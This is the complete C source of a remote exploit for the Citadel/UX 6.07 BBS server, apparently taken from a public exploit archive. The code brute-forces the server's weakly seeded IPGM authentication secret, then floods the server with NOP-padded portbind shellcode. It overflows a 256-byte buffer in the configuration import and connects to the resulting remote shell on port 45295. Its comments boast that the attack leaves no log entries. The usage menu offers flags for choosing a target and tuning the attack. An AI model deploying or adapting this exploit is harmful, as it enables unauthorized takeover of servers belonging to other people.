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Citadel/UX BBS 6.07 Remote Exploit
================================== Citadel/UX BBS 6.07 Remote Exploit ================================== /* Citadel/UX 6.07 Remote exploit By Carl Livitt, July 2003 */ #include <sys/types.h> #include <sys/stat.h> #include <sys/socket.h> #include <net/if.h> #include <netinet/in.h> #include <netinet/tcp.h> #include <arpa/inet.h> #include <stdio.h> #include <string.h> #include <unistd.h> #include <signal.h> #include <netdb.h> #include <time.h> #include <stdarg.h> // If you change these, things will probably break. #define SIZ 4096 #define LEN 298 #define RET 0xbfffaf20 #define CITADEL_PORT 504 #define SHELL_PORT 45295 #define LOCAL_NET() if(localNet) {my_sleep(nanoSecondsToSleep);} #define CHANCE_COUNTER 5 #define NODELAY_ERR -1 #define SOCKET_ERR -2 #define CONNECT_ERR -3 #define HOST_NOT_RESOLVED -4 #define BRUTE_FORCE_EXHAUSTED -5 #define INCORRECT_IPGM_SECRET -6 #define SHELL_NOT_FOUND -7 #define SUCCESS 1 #define FAILED 0 // I'm using prewritten shellcode today... Laziness, Impatience, Hubris! // -------- // linux x86 shellcode by eSDee of Netric (www.netric.org) // 200 byte - forking portbind shellcode - port=0xb0ef(45295) char shellcode[]= "\x31\xc0\x31\xdb\x31\xc9\x51\xb1" "\x06\x51\xb1\x01\x51\xb1\x02\x51" "\x89\xe1\xb3\x01\xb0\x66\xcd\x80" "\x89\xc1\x31\xc0\x31\xdb\x50\x50" "\x50\x66\x68\xb0\xef\xb3\x02\x66" "\x53\x89\xe2\xb3\x10\x53\xb3\x02" "\x52\x51\x89\xca\x89\xe1\xb0\x66" "\xcd\x80\x31\xdb\x39\xc3\x74\x05" "\x31\xc0\x40\xcd\x80\x31\xc0\x50" "\x52\x89\xe1\xb3\x04\xb0\x66\xcd" "\x80\x89\xd7\x31\xc0\x31\xdb\x31" "\xc9\xb3\x11\xb1\x01\xb0\x30\xcd" "\x80\x31\xc0\x31\xdb\x50\x50\x57" "\x89\xe1\xb3\x05\xb0\x66\xcd\x80" "\x89\xc6\x31\xc0\x31\xdb\xb0\x02" "\xcd\x80\x39\xc3\x75\x40\x31\xc0" "\x89\xfb\xb0\x06\xcd\x80\x31\xc0" "\x31\xc9\x89\xf3\xb0\x3f\xcd\x80" "\x31\xc0\x41\xb0\x3f\xcd\x80\x31" "\xc0\x41\xb0\x3f\xcd\x80\x31\xc0" "\x50\x68\x2f\x2f\x73\x68\x68\x2f" "\x62\x69\x6e\x89\xe3\x8b\x54\x24" "\x08\x50\x53\x89\xe1\xb0\x0b\xcd" "\x80\x31\xc0\x40\xcd\x80\x31\xc0" "\x89\xf3\xb0\x06\xcd\x80\xeb\x99"; // These kind of appeared as the exploit was developed void my_send(int, char *, ...); void my_recv(int); void make_shellcode(char *); void make_exploitbuf(char *); int brute_force(int); void usage(void); void my_sleep(int); void increase_chances(int,int); int connect_to_host(char *, int); int attempt_exploit(void); // As did these... all global, as they kepy moving // between functions and I grew sick of it... int localNet=0, bufLenAdjust=0; int nanoSecondsToSleep=100000; int SEED_START=10; int SEED_MAX=30000; int NUM_ATTEMPTS=4; int RESPAWN_SLEEP=10; int seed; struct timespec t; unsigned long retAddr=RET; char buf[SIZ], host[SIZ]; int magicNumber=0,sock,adjustRet=0,ch,retVal,i,r; fd_set rfds; main(int argc, char **argv) { int exploitAttempts=0; // parse command-line while((ch=getopt(argc, argv, "t:li:s:hr:a:A:o:O:b:B:n:S:"))!=-1) { switch(ch) { case 't': strncpy(host, optarg, SIZ-1); break; case 'i': magicNumber=atoi(optarg); printf("[-] Using IPGM secret: %d\n", magicNumber); break; case 'l': localNet=1; printf("[-] Using local net hack\n"); break; case 's': nanoSecondsToSleep=atoi(optarg); printf("[-] Using sleep count of %d where necessary\n", nanoSecondsToSleep); break; case 'r': retAddr=strtoul(optarg,NULL,16); printf("[-] Using RET address: 0x%08x\n", retAddr); break; case 'a': adjustRet=atoi(optarg); retAddr+=adjustRet; printf("[-] Using RET address: 0x%08x\n", retAddr); break; case 'A': adjustRet=atoi(optarg); retAddr-=adjustRet; printf("[-] Using RET address: 0x%08x\n", retAddr); break; case 'o': bufLenAdjust=atoi(optarg); printf("[-] Increasing overflow buffer by %d bytes\n", bufLenAdjust); break; case 'O': bufLenAdjust=atoi(optarg); bufLenAdjust=-bufLenAdjust; printf("[-] Decreasing overflow buffer by %d bytes\n", bufLenAdjust); break; case 'b': SEED_START=atoi(optarg); printf("[-] Bruteforce starting at srand(%d)\n", SEED_START); break; case 'B': SEED_MAX=atoi(optarg); printf("[-] Bruteforce ending at srand(%d)\n", SEED_MAX); break; case 'n': NUM_ATTEMPTS=atoi(optarg); printf("[-] Will try exploit %d times\n", NUM_ATTEMPTS); break; case 'S': RESPAWN_SLEEP=atoi(optarg); printf("[-] Will sleep for %d seconds between exploit attempts\n"); break; case 'h': default: usage(); exit(0); } } while(exploitAttempts++ < NUM_ATTEMPTS && (retVal=attempt_exploit())!=SUCCESS) { switch(retVal) { case HOST_NOT_RESOLVED: printf("[*] Couldn't connect to host: %s not found.\n", host); exit(1); break; case SOCKET_ERR: printf("[*] Couldn't grab a socket!\n"); exit(1); break; case CONNECT_ERR: printf("[*] Connection to %s was rejected\n",host); exit(1); case NODELAY_ERR: printf("[!] WARNING: Failed to set TCP_NODELAY option on socket\n"); break; case BRUTE_FORCE_EXHAUSTED: printf("[*] Brute force operation failed. Aborting.\n"); exit(1); break; case INCORRECT_IPGM_SECRET: printf("[*] IPGM secret incorrect!\n"); exit(1); break; case SHELL_NOT_FOUND: printf("[!] This attempt failed... waiting for INIT to respawn Citadel...\n"); sleep(RESPAWN_SLEEP); break; default: printf("[*] ERROR: There was no error!\n"); break; } } if(exploitAttempts==NUM_ATTEMPTS) printf("[-] Exploit failed %d times. Aborting.\n", exploitAttempts); printf("\nHave a nice day!\n"); exit(0); } int attempt_exploit(void) { int magic; // Connect to the host and grab the banner printf("[-] Connecting to Citadel server (%s) on port %d\n", host, CITADEL_PORT); if((sock=connect_to_host(host,CITADEL_PORT)) < 1) return sock; my_recv(sock); // Attempt to brute-force the secret IPGM authentication number. // Only do this if magic number is not given on command-line (-i flag). magic=magicNumber; if(!magic) { printf("[-] Starting bruteforce operation ...\n");fflush(stdout); if((magic=brute_force(sock))==-1) { return BRUTE_FORCE_EXHAUSTED; } printf("[-] Success! IPGM=%d (seed: %d)\n", magic, seed); magicNumber=magic; // set magicNumber so we don't run bruteforcer again // Tear down the socket, and reconnect again (to reauthenticate), printf("[-] Re-establishing connection to %s ...\n",host); my_send(sock, "QUIT\n"); my_recv(sock); close(sock); if(!(sock=connect_to_host(host,CITADEL_PORT))) return sock; } // Authenticate as internal program, but unlike the brute-force attempts, // tag 4K of shellcode on the end of the request printf("[-] Authenticating as internal progam ...\n"); make_shellcode(buf); my_send(sock, "IPGM %d %s\n", magic, buf); LOCAL_NET(); buf[recv(sock,buf,SIZ-1,0)]=0; // don't do this at home, kids! if(strncmp(buf, "200",3)) { return INCORRECT_IPGM_SECRET; } // Increase the chance of the shellcode being in the correct place at the // correct time by sending it many times... this lets each worker thread // in Citserver copy the shellcode into a buffer, making it almost // certain that we can jump to it successfully (it hasn't failed once!) // Shellcode is stored in a buffer that is used by Citserver to hold // text that would normally get logged to stderr. As Citserver usually // runs as a daemon, this exploit doesn't show in any logs at all. increase_chances(sock,magic); // Enter configuration import mode, specifically the 'floor' section, // although I think others may be vulnerable too printf("[-] Entering config mode ...\n"); my_send(sock, "ARTV import\n"); my_recv(sock); my_send(sock, "floor\n"); // Start the vulnerable import process which blindly reads in 6 lines of // data. These lines are read into buffers 4K in size, and the data is // also truncated at 4K... Unfortunately, the 3rd line goes into a 256 // byte buffer which, of course, overflows.. printf("[-] Sending exploit strings ...\n"); my_send(sock, "a\n"); my_send(sock, "a\n"); // Overflow occurs when this buffer is read by the server, so make sure // it's padded to the correct size with the evil RET address tagged on // the end. make_exploitbuf(buf); my_send(sock,buf); // Send the final 3 lines of text. It can be anything we like... make_shellcode(buf); for(i=0;i<3;i++) my_send(sock,buf); // The server will now have RETurned to the new, malicious saved EIP and // is executing the shellcode... We close the connection, wait a couple of // seconds and then connect to the shell which is bound to port 45295. close(sock); printf("[-] Waiting before connecting to shell...\n"); sleep(2); printf("[-] Now connecting to shell...\n"); if(!(sock=connect_to_host(host,SHELL_PORT))) { return SHELL_NOT_FOUND; } printf("[-] Connected! You can type commands now:\n"); // Now let the attacker issue commands to the remote // shell, just as if (s)he had launched 'nc host 45295'. do { FD_ZERO(&rfds); FD_SET(0, &rfds); FD_SET(sock, &rfds); retVal=select(sock+1, &rfds, NULL, NULL, NULL); if(retVal) { if(FD_ISSET(sock, &rfds)) { buf[(r=recv(sock, buf, SIZ-1,0))]='\0'; // bad! printf("%s", buf); } if(FD_ISSET(0, &rfds)) { buf[(r=read(0, buf, SIZ-1))]='\0'; // bad! send(sock, buf, strlen(buf), 0); } } } while(retVal && r); // loop until connection terminates // Be an environmentally friendly programmer and free resources before exiting... close(sock); return 1; } // Given a hostname (or IP address) and a port number, this function // connects a TCP stream and returns a socket number (or dies trying) int connect_to_host(char *h, int p) { int sock,tmp=1; struct hostent *host; struct sockaddr_in saddr; if((host=gethostbyname(h))==NULL) { return HOST_NOT_RESOLVED; } if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1) { return SOCKET_ERR; } memset((void *)&saddr, 0, sizeof(struct sockaddr_in)); saddr.sin_family=AF_INET; saddr.sin_addr.s_addr=*((unsigned long *)host->h_addr_list[0]); saddr.sin_port=htons(p); if(connect(sock, (struct sockaddr *)&saddr, sizeof(saddr))<0) { return CONNECT_ERR; } // We want this to stop bad buffering on fast networks... TCP_NODELAY seems // to fix strange and intermittent buffering issues on some test boxes, // especially when coupled with 'local net' mode ( See 'help' in usage() ). if(setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (void *)&tmp, sizeof(tmp))!=0) { return NODELAY_ERR; } return sock; } // This will brute-force the secret IPGM (Internal ProGraM) authentication // code for the Citadel server. The IPGM secrets are determined at install // time and use a very weak random number generator that creates precisely // reproducable 'random' numbers. By default, this brute-forcer is setup to // try about 29990 32-bit 'secret' numbers... it's overkill but catches 100% // of Citadel installations tested so far. // Returns IPGM secret number if successful, -1 if not. // Note: This could be a lot more efficient... but seeing as this is a public // release, better not make it _too_ efficient, eh? int brute_force(int s) { char buf[SIZ]; int exitFlag=0, randomNum; // Loop through each seed and try the random number... seed=SEED_START; while(!exitFlag && seed<=SEED_MAX) { printf("[-] Bruteforcing ... %d of %d\r", seed, SEED_MAX);fflush(stdout); srand(seed); my_send(s, "IPGM %d\n", (randomNum=rand())); memset(buf,0,SIZ-1); LOCAL_NET(); recv(s, buf, SIZ-1, 0); if(!strncmp(buf, "200",3)) exitFlag=1; seed++; } printf(" \r"); // Return the magic number to the caller if successful. // Note: we have already been successfully IPGM authenticated, // so no need to do it again in the calling function. if(exitFlag) return randomNum; else return -1; } // Fairly standard function to fill a buffer with LEN bytes of padding, // followed by the RET address to overwrite saved EIP with. An extra non- // printable character is added at the end of the buffer because the Citadel // server will convert the last non-printable character in a buffer to NULL. void make_exploitbuf(char *b) { int l; memset(b,0x00,SIZ-1); memset(b,'a',LEN+bufLenAdjust); l=strlen(b); b[l]=retAddr&0xff; b[l+1]=(retAddr&0xff00)>>8; b[l+2]=(retAddr&0xff0000)>>16; b[l+3]=(retAddr&0xff000000)>>24; // make sure there is a non-printable char _after_ the RET address, because the server // will replace the last non-printable char with a NULL... we don't want our RET NULLified! strcat(b, "_\x01\n"); } // Pad out the shellcode buffer with NOPs to make it easier to hit the // shellcode when the server RETurns from the vulnerable function. Again, // a non-printable char is added to the end of the buffer. void make_shellcode(char *b) { int l; memset(b,0,SIZ-1); memset(b,0x90,SIZ-40); // 40 is arbitrary - enough room for IPGM xxxxxxxxxx memcpy(b+(SIZ-42)-strlen(shellcode), shellcode, strlen(shellcode)); strcat(b,"\x01"); // nonprintable chaar } // Handy little function to send formattable data down a socket. void my_send(int s, char *b, ...) { va_list ap; char *buf; va_start(ap,b); vasprintf(&buf,b,ap); send(s,buf,strlen(buf),0); va_end(ap); free(buf); } // Another handy function to read data from a socket. void my_recv(int s) { int len; char buf[SIZ]; LOCAL_NET(); len=recv(s, buf, SIZ-1, 0); buf[len]=0; // do stuff with buf[] here... //printf("%s"); } // No prizes for guessing what this does.... // Note: this style of multi-line text strings is deprecated and won't compile // under GCC 3.3 - I don't care. void usage(void) { printf(" Citadel Exploit - Public Release Version By Carl Livitt (carllivitt at hush dot com) Flags: -t target Attack host 'target' -l Use 'local net' mode: adds small pauses between send() and recv() calls. Has more chance of succeding on fast networks -i number Specify IPGM number if known - avoids doing brute force discovery -s nanosecs Sleep for 'nanosecs' when in local net mode default: 100000 -r address Specify RET address -a adjustment Add 'adjustment' to RET address -A adjustment Subtract 'adjustment' to RET address -o adjustment Add 'adjustment' to overflow buffer length -O adjustment Subtract 'adjustment' from overflow buffer length -b number Start bruteforce srand() seed at 'number' -B number End bruteforce srand() seed at 'number' -n number Attempt the exploit 'number' times -S seconds Sleep for 'seconds' between exploit attempts -h You're reading it. "); } // Wrapper for nanosleep()... just pass 'n' nanoseconds to it. void my_sleep(int n) { t.tv_sec=0; t.tv_nsec=n; nanosleep(&t,&t); } // Flood the citadel server CHANCE_COUNTER times with the shellcode // to try and make it more likely for the shellcode to be in the right // place at the right time. This function makes one helluva difference // to the exploits reliability (100% reliable to date). void increase_chances(int s, int m) { char buf[SIZ]; int i; make_shellcode(buf); for(i=0;i<CHANCE_COUNTER;i++) { my_send(s, "IPGM %d %s\n", m, buf); my_recv(s); } } # 0day.today [2024-12-26] #